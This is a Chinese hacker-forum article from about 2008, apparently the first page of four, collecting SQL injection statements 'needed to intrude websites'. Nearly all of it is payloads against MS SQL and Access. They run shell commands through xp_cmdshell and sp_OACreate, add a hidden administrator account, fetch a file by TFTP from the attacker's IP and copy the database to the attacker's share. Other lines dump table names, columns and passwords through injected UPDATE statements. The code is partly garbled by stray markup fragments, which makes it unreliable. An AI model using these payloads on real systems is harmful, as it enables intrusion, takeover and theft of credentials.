黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客入门 >> 黑客常识 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[推荐]入侵网站必备经典语句
      ★★★★★

入侵网站必备经典语句

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2008-1-17 13:14:00


  启动_blank>服务

  exec master..xp_blank>_servicecontrol start, server

  ;

  DECLARE @shell INT EXEC SP_blank>_OACREATE wscript.shell,@shell OUTPUT EXEC

  SP_blank>_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user

  jiaoniang$Content$nbsp;1866574 /add

  ;DECLARE @shell INT EXEC SP_blank>_OACREATE

  wscript.shell,@shell OUTPUT EXEC SP_blank>_OAMETHOD @shell,run,null,

  C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$Content$nbsp;/add

  ;

  exec master..xp_blank>_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件

  ;declare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\

  ;declare @a sysname set @a=xp+_blank>_cm’+’dshell exec @a dir c:\

  ;declare @a;set @a=db_blank>_name();backup database @a to

  disk=你的IP你的共享目录bak.dat

  如果被限制则可以。

  select * from openrowset

  (_blank>sqloledb,server;sa;,select OK! exec master.dbo.sp_blank>_addlogin

  hax)

  查询构造:

  SELECT * FROM news WHERE id=... AND topic=... AND .....

  adminand 1=(select count(*) from [user] where username=victim and

  right(left(userpass,01),1)=1) and userpass

  select 123;--

  ;use

  master;--

  :a or name like fff%;-- 显示有一个叫ffff的用户哈。

  and 1(select

  count (email) from [user]);--

  ;update [users] set email=(select top 1 name

  from sysobjects where xtype=u and status>0) where name=ffff;--

  ;update

  [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad)

  where name=ffff;--

  ;update [users] set email=(select top 1 name from

  sysobjects where xtype=u and id>581577110) where name=ffff;--

  ;update

  [users] set email=(select top 1 count(id) from password) where name=ffff;--

  ;update [users] set email=(select top 1 pwd from password where id=2) where

  name=ffff;--

  ;update [users] set email=(select top 1 name from password

  where id=2) where name=ffff;--

  上面的语句是得到_blank>数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。

  通过查看ffff的用户资料可得第一个用表叫ad

  然后根据表名ad得到这个表的ID 得到第二个表的名字

  insert into

  users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73),

  char(0x63)+char (0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--

  insert

  into users values( 667,123,123,0xffff)--

  insert into users values ( 123,

  admin--, password, 0xffff)--

  ;and user>0

  ;and (select count(*) from

  sysobjects)>0

  ;and (select count(*) from mysysobjects)>0

  //为access_blank>数据库

  枚举出数据表名

  ;update aaa set aaa=(select top 1

  name from sysobjects where xtype=u and status>0);--

  这是将第一个表名更新到aaa的字段处。

  读出第一个表,第二个表可以这样读出来(在条件后加上 and name刚才得到的表名)。

  ;update aaa set

  aaa=(select top 1 name from sysobjects where xtype=u and status>0 and

  namevote);--

  然后id=1552 and exists(select * from aaa where aaa>5)

  读出第二个表,一个个的读出,直到没有为止。

  读字段是这样:

  ;update aaa set aaa=(select top 1

  col_blank>_name (object_blank>_id(表名),1));--

  然后id=152 and

  exists(select * from aaa where aaa>5)出错,得到字段名

上一页  [1] [2] [3] [4] 

文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体:
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886